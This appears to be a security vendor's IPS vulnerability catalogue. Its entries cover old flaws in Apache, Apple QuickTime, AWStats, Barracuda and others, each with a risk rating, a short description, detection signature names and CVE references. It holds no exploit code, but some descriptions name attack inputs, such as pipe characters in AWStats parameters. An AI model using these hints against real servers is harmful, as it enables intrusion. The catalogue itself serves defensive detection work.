http://www.securityfocus.com/bid/2512
Back to top

HTTP-Anhttpd-Isapi-Count-Pl-DoS

About this vulnerability: Anhttpd Isamp Count Pl DoS
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AN-HTTPd
Type: Directory Traversal
Description: A directory traversal bug in AN HTTP server allows an attacker to overwrite contents of a file using count.pl cgi script, which is included with the webserver.
Situation: HTTP_CSU-Anhttpd-Isapi-Count-Pl-DoS
Back to top

HTTP-Ans-Pl-Directory-Traversal

About this vulnerability: Ans Pl Directory Traversal
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Avenger's News System
Type: Directory Traversal
Description: Avenger's News System contains a directory traversal vulnerability which allows the attacker to view arbitary files on the victim system.
References:
CVE-2002-0307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0307
BID-4147
http://www.securityfocus.com/bid/4147
Back to top

HTTP-AOLserver-Dotdotdot-Directory-Traversal

About this vulnerability: AOLserver "..." directory traversal vulnerability
Risk: Low
First detected in: sgpkg-ips-48-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AOLserver
Type: Directory Traversal
Description: A directory travesal vulnerability in AOLServer 3.2 allows remote attacker to read arbitrary files
Situation: HTTP_CSU-Dotdotdot-Directory-Traversal
References:
CVE-2001-0205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0205
BID-2343
http://www.securityfocus.com/bid/2343
Back to top

HTTP-Apache-Auth_LDAP-Format-String-Vulnerability

About this vulnerability: Format string vulnerability in Apache LDAP
Risk: Moderate
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache mod_auth_ldap
Type: Format String
Description: Apache auth_ldap module 1.6.0 suffers from a format string vulnerability where usernames containing format string characters allows remote attackers to execute arbitrary code on the vulnerable server.
Situation: HTTP_CSH-Basic-Authentication-Username-Contains-Format-String-Characters
References:
CVE-2006-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150
BID-16177
http://www.securityfocus.com/bid/16177
Back to top

HTTP-Apache-Backslash-Directory-Traversal

About this vulnerability: Apache Backslash Directory Traversal
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1640-5242
Platform: Windows
Software: Apache
Type: Directory Traversal
Description: Apache contains a directory traversal vulnerability which may be exploited to gain remote system compromise (when escaping the cgi-bin directory) or file disclosure.
Situation: HTTP_CSU-Apache-Backslash-Directory-Traversal
References:
CVE-2002-0661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661
BID-5434
http://www.securityfocus.com/bid/5434
Back to top

HTTP-Apache-Chunked-Encoding-BOF

About this vulnerability: Apache Chunked Encoding Buffer Overflow
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Buffer Overflow
Description: Apache webservers incorrectly handle chunked encoding requests which can be exploited to execute arbitaty code on the system. By sending a crafted chunk-encoded HTTP request, a remote attacker can cause a denial of service or execute arbitrary code with the privileges of the vulnerable service process.
Situation: HTTP_CSH-Transfer-Encoding-Chunked
HTTP_CCH-Apache-Chunked-Encoding-BO-3
HTTP_CS-Apache-Chunked-Encoding-BO-4
HTTP_CCH-Apache-Chunked-Encoding-BO-5
HTTP_CCH-Apache-And-Nginx-Multiple-Chunked-Encoding-Vulnerabilities
References:
CVE-2002-0392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0392
BID-5033
http://www.securityfocus.com/bid/5033
OSVDB-838
http://www.osvdb.org/838
Back to top

HTTP-Apache-Crlf-Resource-Starvation-DoS

About this vulnerability: Apache Crlf Resource Starvation Denial of Service
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Resource Starvation
Description: Apache server can be tricked into allocating lots of memory by sending excessive amounts of line feed characters. This will result in a denial of service condition.
Situation: HTTP_CS-Apache-Crlf-DoS
References:
CVE-2003-0132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0132
BID-7254
http://www.securityfocus.com/bid/7254
Back to top

HTTP-Apache-Host-Header-Default-Error-Page-XSS

About this vulnerability: Apache web server XSS vulnerability in default error page
Risk: Low
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Cross-site Scripting
Description: Apache versions 1.3.0-1.3.26 and 2.0-2.0.43 have a cross-site scripting vulnerability in the default error page. A link containing a crafted host field can be used to execute script code in the context of the webserver, and can be used to take arbitrary actions as the victim who follows the link.
Situation: HTTP_CSH-Apache-Host-Header-Default-Error-Page-XSS
HTTP_CSH-Script-In-Host-Header
References:
CVE-2002-0840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0840
BID-5847
http://www.securityfocus.com/bid/5847
OSVDB-862
http://www.osvdb.org/862
Back to top

HTTP-Apache-Memory-Consumption-Denial-Of-Service

About this vulnerability: Certain versions of Apache web server allocates extensive amount of memory when processing certain invalid header fields in HTTP request
Risk: Low
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Resource Starvation
Description: Certain versions of Apache web server allocate too much memory when processing certain invalid header fields in HTTP request.
Situation: HTTP_CSH-Invalid-HTTP-Request-Header-Field
References:
CVE-2004-0942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0942
Back to top

HTTP-Apache-Mod-Proxy-DoS

About this vulnerability: Denial of service vulnerability in Apache mod_proxy
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache mod_proxy
Type: Resource Starvation
Description: The Apache mod_proxy has a buffer overflow vulnerability. By sending a negative Content-length in HTTP header, the server can be made to copy large amounts of memory.
Situation: HTTP_CSH-Negative-Content-Length-Value
References:
CVE-2004-0492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0492
Back to top

HTTP-Apache-Mod-Rewrite-Module-LDAP-Scheme-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Apache HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-74-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apache HTTP Server. The vulnerability can be exploited by sending a malformed HTTP request with a specially crafted URL string that contains an LDAP schema and five or more CGI variables. This causes a DoS condition or execution of arbitrary code with the privileges of Apache HTTP Server.
Situation: HTTP_CSU-Apache-Mod-Rewrite-Module-LDAP-Scheme-Handling-Buffer-Overflow
References:
CVE-2006-3747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747
BID-19204
http://www.securityfocus.com/bid/19204
OSVDB-27588
http://www.osvdb.org/27588
Back to top

HTTP-Apache-Mod-SSL-Custom-Error-Page-Non-SSL-DoS

About this vulnerability: Apache mod_ssl denial of service vulnerability when sending non-SSL requests to an SSL port
Risk: Moderate
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: Mod_ssl in Apache 2.0 - 2.0.55 suffers from a denial of service vulnerability when non-SSL requests are sent to an SSL port. If a vulnerable host is configured with an SSL vhost with access control and a custom 400 error page, remote attackers can exploit the vulnerability to crash Apache.
Situation: HTTPS_CS-Plaintext-Request-In-HTTPS-Context
References:
CVE-2005-3357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3357
BID-16152
http://www.securityfocus.com/bid/16152
Back to top

HTTP-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability

About this vulnerability: APR apr_sprintf long string vulnerability
Risk: Low
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: The function apr_psprintf in Apache versions 2.0.37 - 2.0.45 does not handle long strings properly. This allows remote attackers to cause a denial of service by crashing the server.
Situation: HTTP_CS-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability-Suspected
HTTP_CSH-Oversized-Host-Header-Field
HTTP_CS-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability
References:
CVE-2003-0245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0245
BID-7723
http://www.securityfocus.com/bid/7723
Back to top

HTTP-Apache-Potential-Probe

About this vulnerability: Potential vulnerability probe of Apache httpd
Risk: Low
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Insecure Configuration
Description: Suspicious vulnerability probe of an Apache httpd web server.
Situation: HTTP_CSU-Apache-Potential-Probe
HTTP_CSU-Apache-Server-Status-Probe
Back to top

HTTP-Apache-Struts-Arbitrary-Remote-Java-Execution

About this vulnerability: Apache Struts Remote Java Execetuion Vulnerability
Risk: High
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Code Injection
Description: A command execution vulnerability exists in the web application framework Apache Struts2. The vulnerability is due to insufficient input validation in the ParametersInterceptor component when parsing incoming HTTP requests. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to a target system. In attack scenarios where code execution is successful, the behaviour of the affected server depends entirely on the logic of the attacker-controlled code. This malicious code would be executed within the privileges of the affected service. Unsuccessful attack attempts may cause the targeted web application to stop responding or enter into an error state, resulting in a denial of service condition.
Situation: HTTP_CRL-Apache-Struts-Remote-Java-Execution-3
HTTP_CRL-Apache-Struts-Remote-Java-Execution-2
HTTP_CRL-Apache-Struts-Remote-Java-Execution
References:
CVE-2010-1870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1870
BID-41592
http://www.securityfocus.com/bid/41592
OSVDB-66280
http://www.osvdb.org/66280
Back to top

HTTP-Apache-Struts-Directory-Traversal-File-Disclosure

About this vulnerability: Apache Struts directory traversal file disclosure
Risk: Moderate
First detected in: sgpkg-ips-182-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in the Apache Struts. The vulnerability is due to an input validation error in Struts that does not properly sanitize the URI for directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server.
Situation: HTTP_CSU-Apache-Struts-Encoded-Dot-Dot-Slash-Directory-Traversal
References:
CVE-2008-6505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6505
BID-32104
http://www.securityfocus.com/bid/32104
OSVDB-49734
http://www.osvdb.org/49734
OSVDB-49733
http://www.osvdb.org/49733
Back to top

HTTP-Apache-Tomcat-Snp-Information-Disclosure

About this vulnerability: Apache Tomcat snp Information Disclosure
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Malfunction
Description: Tomcat for Apache reveals information like paths and OS about the system when a non-existent snp file is requested.
Situation: HTTP_CS-Apache-Tomcat-Snp-Access
References:
CVE-2000-0760
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0760
BID-1532
http://www.securityfocus.com/bid/1532
Back to top

HTTP-Apache-WebDAV-Propfind-Dir-Disclosure

About this vulnerability: Apache WebDAV propfind directory disclosure
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Insecure Configuration
Description: The insecure default configuration of Apache WebDAV on SUSE Linux 6.4 provides directory listings to the attacker. Directory listings can be used to find more vulnerabilities and thus to launch new, more severe attacks.
Situation: HTTP_CS-Apache-WebDAV-Propfind-Access
References:
CVE-2000-0869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0869
BID-1656
http://www.securityfocus.com/bid/1656
Back to top

HTTP-Apache-Win32-Pipe-Metacharacter-Attack

About this vulnerability: Apache Win32 Pipe Metacharacter Attack
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apache
Type: Metacharacter
Description: Apache for Windows can be tricked into executing arbitary commands with SYSTEM privileges through the batch file execution functionality by using the pipe character.
Situation: HTTP_CRL-Apache-Win32-Pipe-Metacharacter-Attack
References:
CVE-2002-0061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0061
BID-4335
http://www.securityfocus.com/bid/4335
Back to top

HTTP-Apache2-Consume-Memory-DoS

About this vulnerability: Memory exhaustion vulnerability in Apache
Risk: Moderate
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1528-5242
Platform: Linux; OS X; HP-UX
Software: Apache
Type: Resource Starvation
Description: A specially crafted HTTP request may cause the Apache process to consume all the available memory and crash.
Situation: HTTP_CS-Apache2-Out-Of-Memory-DoS
References:
CVE-2004-0493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0493
BID-10619
http://www.securityfocus.com/bid/10619
Back to top

HTTP-Apple-Ichat-Aim-Url-Handler-Format-String-Vulnerability

About this vulnerability: A format string vulnerability in Apple iChat client
Risk: Moderate
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1425-5242
Platform: Mac OS X
Software: Apple iChat AV
Type: Format String
Description: There is a format string vulnerability in Apple iChat instant messaging client. A malicious, crafted web page may be used to execute code in the context of the current user, leading to system compromise or denial of service.
Situation: HTTP_Apple-Ichat-Aim-Url-Handler-Format-String-Vulnerability
References:
CVE-2007-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0021
BID-22146
http://www.securityfocus.com/bid/22146
OSVDB-32715
http://www.osvdb.org/32715
Back to top

HTTP-Apple-iPhoto-Xml-Title-Format-String-Vulnerability

About this vulnerability: A format string vulnerability in Apple iPhoto
Risk: Moderate
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: Apple iPhoto
Type: Format String
Description: There is a format string vulnerability in Apple iPhoto. A crafted photocast can be used to execute code with the privileges of the current user.
Situation: HTTP_Apple-iPhoto-Xml-Title-Format-String-Vulnerability
File-Text_Apple-iPhoto-Xml-Title-Format-String-Vulnerability
File-TextId_Apple-iPhoto-Xml-Title-Format-String-Vulnerability
References:
CVE-2007-0051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0051
BID-21871
http://www.securityfocus.com/bid/21871
OSVDB-31165
http://www.osvdb.org/31165
Back to top

HTTP-Apple-QuickTime-FPX-File-Handling-Integer-Overflow

About this vulnerability: Heap based buffer overflow vulnerability in Apple Quicktime
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: Apple Quicktime has a heap based buffer overflow vulnerability. The vulnerability can be exploited by persuading a user to open a specially crafted FPX file with a vulnerable product, causing a DoS or allowing non-privileged code execution.
Situation: HTTP_Apple-QuickTime-FPX-File-Handling-Integer-Overflow
E-Mail_BS-Apple-QuickTime-FPX-File-Handling-Integer-Overflow
File-OLE_Apple-QuickTime-FPX-File-Handling-Integer-Overflow
References:
CVE-2006-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1249
BID-17074
http://www.securityfocus.com/bid/17074
Back to top

HTTP-Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow

About this vulnerability: Stack-based buffer overflow vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-82-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: Apple QuickTime has a stack-based buffer overflow vulnerability. A remote attacker can entice a target user to download and open a malicious H.264 file with the vulnerable QuickTime product to cause a DoS or execute arbitrary non-privileged code on the victim's computer.
Situation: HTTP_Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow
File-MPEG_Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow
References:
CVE-2006-4381
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4381
BID-19976
http://www.securityfocus.com/bid/19976
OSVDB-28774
http://www.osvdb.org/28774
Back to top

HTTP-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apple QuickTime. A remote attacker can exploit this vulnerability by persuading a user to open a malicious Quicktime movie file with a vulnerable version of the affected product. Successful exploitation allows code execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow
File-MPEG_Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow
References:
CVE-2008-1022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1022
BID-28583
http://www.securityfocus.com/bid/28583
OSVDB-44003
http://www.osvdb.org/44003
Back to top

HTTP-Apple-QuickTime-Plug-In-Security-Bypass

About this vulnerability: Security bypass vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There is a security bypass vulnerability in Apple QuickTime. The vulnerability can be exploited by persuading a target user to launch a malicious QuickTime Media Link file with the vulnerable product. This causes arbitrary non-privileged script code execution on the victim's computer.
Situation: HTTP_Apple-QuickTime-Plug-In-Security-Bypass
File-TextId_Apple-QuickTime-Plug-In-Security-Bypass
References:
CVE-2006-4965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4965
BID-20138
http://www.securityfocus.com/bid/20138
OSVDB-29064
http://www.osvdb.org/29064
Back to top

HTTP-Apple-QuickTime-RTSP-URI-Buffer-Overflow

About this vulnerability: A vulnerability in Apple QuickTime rtsp protocol handler allows code execution
Risk: High
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the RTSP protocol handler of the Apple QuickTime Player. A crafted URI can be used to execute code in the context of the current user.
Situation: HTTP_SS-Apple-QuickTime-RTSP-URI-Buffer-Overflow
File-TextId_Apple-QuickTime-RTSP-URI-Buffer-Overflow
References:
CVE-2007-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015
BID-21829
http://www.securityfocus.com/bid/21829
OSVDB-31023
http://www.osvdb.org/31023
Back to top

HTTP-Apple-Safari-Regular-Expression-Heap-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Apple Safari web browser
Risk: High
First detected in: sgpkg-ips-118-2032
Last changed: sgpkg-ips-1555-5242
Platform: Generic
Software: Safari
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apple Safari web browser. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_Apple-Safari-Regular-Expression-Heap-Buffer-Overflow
References:
CVE-2007-3944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3944
BID-25002
http://www.securityfocus.com/bid/25002
Back to top

HTTP-Arbitroweb-Rawurl-Cross-Site

About this vulnerability: Cross-site scripting vulnerability in Arbitroweb's rawurl parameter
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1602-5242
Platform: Generic
Software: Arbitroweb
Type: Malfunction
Description: Arbitroweb is vulnerable to cross-site scripting. The Index.php script's rawUrl parameter is not properly filtered, allowing arbitrary HTML or script code to be entered.
References:
CVE-2004-0617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0617
BID-10592
http://www.securityfocus.com/bid/10592
Back to top

HTTP-Artmedic-Links5-File-Disclosure

About this vulnerability: Artmedic_links5 file disclosure vulnerability
Risk: Low
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: artmedic_links5
Type: Malfunction
Description: Artmedic_links5 allows remote attackers to view arbitrary files on the Web server by passing file names or URLs to 'index.php?id'.
References:
CVE-2004-0624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0624
Back to top

HTTP-Awstats-Config-Parameter-Command-Execution

About this vulnerability: Command execution via AWStats config parameter
Risk: High
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AWStats
Type: Malfunction
Description: Awstats 'config' parameter can be used to execute commands with shell metacharacters. This allows remote attackers to execute arbitrary commands on the server via HTTP requests.
Situation: HTTP_CSU-Awstats-Config-Parameter-Command-Execution
References:
CVE-2005-0363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0363
BID-12543
http://www.securityfocus.com/bid/12543
Back to top

HTTP-Awstats-Configdir-Parameter-System-Compromise

About this vulnerability: Awstats arbitrary command execution vulnerability
Risk: High
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AWStats
Type: Metacharacter Injection
Description: AWStats is a tool that creates web statistics that does not validate input correctly. A remote attacker can execute arbitrary commands on the host by requesting awstats.pl and giving the configdir parameter a value that contains commands preceded and followed by pipe '|' metacharacters.
Situation: HTTP_CSU-Awstats-Configdir-Parameter-System-Compromise
HTTP_CRL-Awstats-Configdir-Parameter-System-Compromise-2
HTTP_SS-Lupper-Worm-Download
File-Binary_Lupper-Worm-Download
References:
CVE-2005-0116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116
BID-12298
http://www.securityfocus.com/bid/12298
OSVDB-13002
http://www.osvdb.org/13002
Back to top

HTTP-Awstats-Logfile-Parameter-Command-Execution

About this vulnerability: Command execution via AWStats logfile parameter
Risk: High
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AWStats
Type: Malfunction
Description: Awstats 'logfile' parameter can be used to execute commands with shell metacharacters. This allows remote attackers to execute arbitrary commands on the server via HTTP requests.
Situation: HTTP_CSU-Awstats-Logfile-Parameter-Command-Execution
HTTP_CRL-Awstats-Logfile-Parameter-Command-Execution-2
References:
BID-12572
http://www.securityfocus.com/bid/12572
Back to top

HTTP-Awstats-Plugin-Arbitrary-Command-Execution

About this vulnerability: Command execution vulnerability in Awstats
Risk: High
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AWStats
Type: Malfunction
Description: Awstats has a vulnerability in the handling of plugins that allows arbitrary command execution. Remote attackers can include commands in the 'pluginmode' parameter, allowing arbitrary commands to be executed via HTTP requests.
Situation: HTTP_CSU-Awstats-Plugin-Arbitrary-Command-Execution
References:
CVE-2005-0362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0362
BID-12543
http://www.securityfocus.com/bid/12543
OSVDB-16089
http://www.osvdb.org/16089
Back to top

HTTP-Awstats-Rawplugin-Log-Disclosure

About this vulnerability: Log disclosure vulnerability in Awstats
Risk: High
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AWStats
Type: Malfunction
Description: Awstats discloses web server logs when 'loadplugin' and 'pluginmode' parameters are set to rawlog. This allows remote attackers to read sensitive information, such as IP addresses, GET queries, etc.
Situation: HTTP_CSU-Awstats-Rawplugin-Log-Disclosure
References:
CVE-2005-0435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0435
Back to top

HTTP-Axis-Storpoint-Authentication-Bypass

About this vulnerability: Axis Storpoint Authentication Bypass
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AXIS StorPoint
Type: Malfunction
Description: The remote administration for Axis Storpoint contains a vulnerability which allows the bypassing of the authentication to gain elevated system privileges on the victim system.
Situation: HTTP_CS-Axis-Storpoint-Authentication-Bypass
References:
CVE-2000-0191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191
BID-1025
http://www.securityfocus.com/bid/1025
OSVDB-19
http://www.osvdb.org/19
Back to top

HTTP-Aztec-Forum-Admin-Password-Disclosure

About this vulnerability: Aztec forum admin password disclosure
Risk: Moderate
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Aztec Forum
Type: Malfunction
Description: Aztec forum has a vulnerability, which allows remote attackers to obtain the admin password. The vulnerability can be triggered by a HTTP request to the forum, and results in remote attackers being able to administer the forum.
Situation: HTTP_CS-Aztec-Forum-Admin-Password-Disclosure
References:
BID-12745
http://www.securityfocus.com/bid/12745
Back to top

HTTP-Backdoor-WANRemote

About this vulnerability: WANRemote backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WANRemote
Type: Backdoor
Description: WANRemote is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a browser.
Situation: HTTP_WANRemote-Backdoor-Response
File-Text_WANRemote-Backdoor-Response
Back to top

HTTP-Backdoor-Web-Server-CT

About this vulnerability: Web Server CT backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Web Server CT
Type: Backdoor
Description: Web Server CT is a trojan horse program that provides a backdoor to an infected system. The backdoor allows a remote attacker to control the backdoored system via a browser.
Situation: HTTP_Web-Server-CT-Backdoor-Response
HTTP_SHS-Web-Server-CT-Backdoor-Response
Back to top

HTTP-BadBlue-Mfcisapicommand-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in ext.dll in BadBlue
Risk: Moderate
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BadBlue
Type: Buffer Overflow
Description: Working Resources Inc. BadBlue 2.55 contains a buffer overflow vulnerability in the ext.dll when handling data given in 'mfcisapicommand' parameter. Remote attackers can exploit this vulnerability to execute arbitrary code on the victim server.
Situation: HTTP_CSU-BadBlue-Mfcisapicommand-Buffer-Overflow
References:
CVE-2005-0595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0595
BID-12673
http://www.securityfocus.com/bid/12673
OSVDB-14238
http://www.osvdb.org/14238
Back to top

HTTP-BadBlue-PassThru-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in ext.dll in BadBlue
Risk: Moderate
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BadBlue
Type: Buffer Overflow
Description: Working Resources Inc. BadBlue 2.55 contains a stack based buffer vulnerability in the PassThru functionality in ext.dll, in BadBlue 2.72b and earlier.
Situation: HTTP_CSU-BadBlue-Mfcisapicommand-Buffer-Overflow
References:
CVE-2007-6377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6377
BID-26803
http://www.securityfocus.com/bid/26803
OSVDB-42416
http://www.osvdb.org/42416
Back to top

HTTP-Bajerie-Four-Dots-Directory-Traversal

About this vulnerability: Bajerie HTTP web server allows directory traversal with four dots
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Bajerie HTTP Server
Type: Directory Traversal
Description: The Bajerie HTTP server goes into the root directory if it encounters 4 dots (....) in the URI. This allows remote attackers to display any file located on the same drive as the HTTP server.
References:
CVE-2000-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773
BID-1522
http://www.securityfocus.com/bid/1522
Back to top

HTTP-Barracuda-Spam-Firewall-Img-Pl-Compromise

About this vulnerability: Barracuda Spam Firewall allows arbitrary shell command execution
Risk: High
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Other
Software: Barracuda Spam Firewall
Type: Malfunction
Description: Barracuda Spam Firewall with version 3.1.17 firmware is vulnerable to arbitrary shell command execution. By sending suitable input to img.pl script's parameter, remote attackers can view files and execute arbitrary shell commands on the vulnerable host with the web server's privileges. A proof of concept exploit exists that extracts the firewalls admin password.
Situation: HTTP_CSU-Barracuda-Spam-Firewall-Img-Pl-Compromise
References:
CVE-2005-2847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2847
BID-14712
http://www.securityfocus.com/bid/14712
Back to top

HTTP-Barracuda-Spam-Firewall-Preview-Email-Command-Execution

About this vulnerability: Barracuda Spam Firewall command execution and file disclosure vulnerability
Risk: Moderate
First detected in: sgpkg-ips-74-1314
Last changed: sgpkg-ips-1296-5242
Platform: Other
Software: Barracuda Spam Firewall
Type: Directory Traversal
Description: The Barracuda Spam Firewall has a directory traversal vulnerability related to the preview_email.cgi script. This vulnerability allows authenticated remote attackers to view and execute arbitrary files accessible to the web server user.
Situation: HTTP_CS-Barracuda-Spam-Firewall-Preview-Email-Command-Execution
References:
CVE-2006-4081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4081
BID-19276
http://www.securityfocus.com/bid/19276
Back to top

HTTP-Basilix-Webmail-Misconfiguration

About this vulnerability: Basilix Webmail Misconfiguration
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Basilix Webmail
Type: Misconfiguration
Description: The Basilix Webmail is misconfigured and allows the disclosure of files containing sensitive information.
References:
CVE-2001-1044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1044
BID-2198
http://www.securityfocus.com/bid/2198
Back to top

HTTP-Bea-Interactivequery-Jsp-Cross-Site

